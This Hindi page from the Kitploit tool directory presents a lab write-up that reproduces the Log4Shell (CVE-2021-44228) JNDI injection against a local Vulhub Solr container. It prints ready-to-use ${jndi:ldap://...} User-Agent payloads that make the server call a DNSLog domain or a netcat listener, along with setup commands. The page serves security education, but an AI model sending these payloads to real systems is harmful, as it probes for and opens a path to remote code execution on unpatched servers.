Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4Shell-Vulnerability-Replication — CVE-2021-44228 कमजोरी का पुनरुत्पादन पूर्ण रिकॉर्ड (पर्यावरण सेटअप, ट्रिगर सत्यापन सहित) | Kitploit
उपकरण/GitHubGitHub/hmxh123/log4shell-vulnerability-replication
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubhmxh123/log4shell-vulnerability-replication

Log4Shell-Vulnerability-Replication

CVE-2021-44228 कमजोरी का पुनरुत्पादन पूर्ण रिकॉर्ड (पर्यावरण सेटअप, ट्रिगर सत्यापन सहित)

रिपॉजिटरी देखें
83 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228 (Log4Shell) भेद्यता का पूर्ण पुनरुत्पादन रिकॉर्ड

यह रिकॉर्ड Vulhub द्वारा प्रदान किए गए Apache Solr 8.11.0 प्रशिक्षण मैदान पर आधारित है, जिसमें Log4j2 JNDI इंजेक्शन भेद्यता का पूरी तरह से पुनरुत्पादन किया गया है, और DNSLog और स्थानीय LDAP मॉनिटरिंग के माध्यम से भेद्यता के अस्तित्व को सफलतापूर्वक सत्यापित किया गया है।

一、प्रायोगिक वातावरण

  • ऑपरेटिंग सिस्टम: Windows 11 + WSL2 (Ubuntu)
  • कंटेनर प्लेटफ़ॉर्म: Docker Desktop 4.76
  • प्रशिक्षण मैदान स्रोत: Vulhub (vulhub/log4j/CVE-2021-44228)
  • लक्ष्य सेवा: Apache Solr 8.11.0 (log4j-core 2.14.1 सहित)
  • आक्रमण मशीन: स्थानीय होस्ट (DNSLog क्लाइंट और LDAP मॉनिटरिंग एंड दोनों के रूप में)

二、वातावरण निर्माण प्रक्रिया

2.1 Vulhub स्रोत कोड प्राप्त करना

GitHub से सीधा कनेक्शन अस्थिर होने के कारण, Gitee मिरर का उपयोग करके त्वरित किया गया:

cd D:\\SecWork
git clone https://gitee.com/hanxu2486/vulhub.git

2.2 घरेलू नेटवर्क पर Docker इमेज पुलिंग समस्या का समाधान

Alibaba Cloud विशेष इमेज एक्सेलेरेटर कॉन्फ़िगर करें (व्यक्तिगत पता प्राप्त करने के लिए कंटेनर इमेज सेवा में लॉग इन करें):

  • Docker Desktop → Settings → Docker Engine खोलें
  • registry-mirrors संशोधित करें:
{
  "registry-mirrors": ["https://xxxxx.mirror.aliyuncs.com"]
}
  • Apply & Restart पर क्लिक करें

यदि अभी भी TLS handshake timeout का सामना करना पड़ता है, तो WSL में sudo hwclock -s चलाकर समय सिंक करें।

2.3 Solr कंटेनर प्रारंभ करना

cd D:\SecWork\vulhub\log4j\CVE-2021-44228
docker-compose up -d

आउटपुट सफलता दर्शाता है:

✔ Image vulhub/solr:8.11.0    Pulled    117.7s
✔ Container cve-2021-44228-solr-1    Started

http://localhost:8983/solr पर जाकर Solr प्रबंधन इंटरफ़ेस दिखाई देता है, वातावरण तैयार है।

三、भेद्यता पुनरुत्पादन चरण

3.1 परीक्षण Core बनाना

Solr में डिफ़ॉल्ट रूप से कोई core नहीं है, इसे मैन्युअल रूप से बनाना होगा:

curl "http://localhost:8983/solr/admin/cores?action=CREATE&name=test&configSet=_default"

"status":0 लौटता है, core test सफलतापूर्वक बन गया।

3.2 DNSLog का उपयोग करके भेद्यता की उपस्थिति का पता लगाना

ब्राउज़र में http://dnslog.cn खोलें, Get SubDomain पर क्लिक करें, एक अस्थायी डोमेन नाम प्राप्त करें, उदाहरण के लिए abc123.dnslog.cn

कमांड लाइन में निष्पादित करें (PowerShell उपनाम हस्तक्षेप से बचने के लिए curl.exe का उपयोग करें):

curl.exe -H 'User-Agent: ${jndi:ldap://abc123.dnslog.cn/test}' 'http://localhost:8983/solr/test/select?q=*:*'

http://dnslog.cn पेज पर वापस जाएँ, Refresh Record पर क्लिक करें, तुरंत DNS रिज़ॉल्यूशन रिकॉर्ड दिखाई देता है, जो भेद्यता के अस्तित्व को साबित करता है।

3.3 स्थानीय मॉनिटरिंग द्वारा सत्यापन (गहन सत्यापन)

WSL में मॉनिटरिंग शुरू करें: nc -lvp 1389

होस्ट मशीन का IP प्राप्त करें (Windows PowerShell में ipconfig चलाएँ, WSL वर्चुअल नेटवर्क एडेप्टर का IP खोजें, जैसे 172.30.208.1)

स्थानीय IP के साथ दुर्भावनापूर्ण अनुरोध भेजें:

curl.exe -H 'User-Agent: ${jndi:ldap://172.30.208.1:1389/test}' 'http://localhost:8983/solr/test/select?q=*:*'

nc विंडो का निरीक्षण करें, कनेक्शन जानकारी दिखाई देती है:

connect to [172.30.208.1] from localhost [127.0.0.1] 54321

यह साबित करता है कि Solr ने सफलतापूर्वक आक्रमण मशीन पर LDAP क्वेरी भेजी, भेद्यता पुनरुत्पादन सफल रहा।

四、भेद्यता सिद्धांत का संक्षिप्त विवरण

Apache Log4j2 द्वारा प्रदान की गई JndiLookup सुविधा लॉग संदेशों में ${jndi:ldap://...} प्रारूप के प्लेसहोल्डर का उपयोग करने की अनुमति देती है। जब लॉग संदेश रिकॉर्ड किया जाता है, तो Log4j2 उस प्लेसहोल्डर को पार्स करता है और JNDI के माध्यम से दूरस्थ LDAP सर्वर तक पहुँचने का प्रयास करता है। हमलावर एक दुर्भावनापूर्ण LDAP सर्वर स्थापित कर सकता है जो Java डीसीरियलाइज़ेशन पेलोड लौटाता है, जिससे रिमोट कोड निष्पादन संभव होता है।

इस पुनरुत्पादन में, User-Agent हेडर को दुर्भावनापूर्ण पेलोड पर सेट करके, Solr ने अनुरोध को संसाधित करते समय उस हेडर को रिकॉर्ड किया, जिससे JNDI क्वेरी ट्रिगर हुई, जो भेद्यता के अस्तित्व को साबित करती है।

五、प्रयोगात्मक परिणामों का सारांश

✅ Vulhub भेद्यता वातावरण सफलतापूर्वक स्थापित किया गया, घरेलू नेटवर्क के तहत कई समस्याओं (DNS हाईजैक, इमेज एक्सेलेरेशन, WSL समय सिंक्रोनाइज़ेशन आदि) को दूर किया गया।

✅ स्वतंत्र रूप से भेद्यता ट्रिगरिंग पूरी की गई, DNSLog और स्थानीय मॉनिटरिंग दो तरीकों से JNDI इंजेक्शन को सत्यापित किया गया।

✅ Log4Shell भेद्यता सिद्धांत और JNDI इंजेक्शन के हमले की श्रृंखला की गहन समझ प्राप्त की गई।

✅ Docker नेटवर्क समस्या निवारण, WSL2 कॉन्फ़िगरेशन, Git प्रॉक्सी क्लीनअप आदि में व्यावहारिक अनुभव अर्जित किया गया।

六、समस्या निवारण अनुभव सारांश

समस्या घटनामूल कारणसमाधान
git clone 502 / कनेक्शन टाइमआउटDNS हाईजैक / प्रॉक्सी हस्तक्षेपGitee मिरर का उपयोग करें, Git प्रॉक्सी साफ़ करें, DNS रिफ़्रेश करें
Docker इमेज पुलिंग पर 429सार्वजनिक इमेज स्रोत रेट लिमिटAlibaba Cloud विशेष एक्सेलेरेटर कॉन्फ़िगर करें
TLS handshake timeoutWSL2 समय सिंक न होनाsudo hwclock -s से समय सिंक करें
भेद्यता ट्रिगर नहीं हो रहीcore नहीं बनाया गया या पेलोड गलत स्थानcore बनाएँ, User-Agent हेडर का उपयोग करें

七、पूर्ण कमांड सूची

# Vulhub क्लोन करें (Gitee मिरर का उपयोग करके)
git clone https://gitee.com/hanxu2486/vulhub.git

# भेद्यता निर्देशिका में प्रवेश करें
cd D:\SecWork\vulhub\log4j\CVE-2021-44228

# वातावरण प्रारंभ करें
docker-compose up -d

# Solr Core बनाएँ
curl "http://localhost:8983/solr/admin/cores?action=CREATE&name=test&configSet=_default"

# DNSLog सत्यापन
curl -H 'User-Agent: ${jndi:ldap://your.dnslog.cn/test}' 'http://localhost:8983/solr/test/select?q=*:*'

# स्थानीय मॉनिटरिंग सत्यापन (WSL में nc चलाएँ)
nc -lvp 1389
curl -H 'User-Agent: ${jndi:ldap://your.wsl.ip:1389/test}' 'http://localhost:8983/solr/test/select?q=*:*'

# वातावरण बंद करें
docker-compose down

八、संदर्भ लिंक

Vulhub आधिकारिक परियोजना

CVE-2021-44228 विवरण

DNSLog प्लेटफ़ॉर्म

लेखन तिथि: जून 2026
लेखक: HanXu
रिपॉजिटरी पता: https://github.com/hmxh123/Log4Shell-Vulnerability-Replication

टूल डाउनलोड करें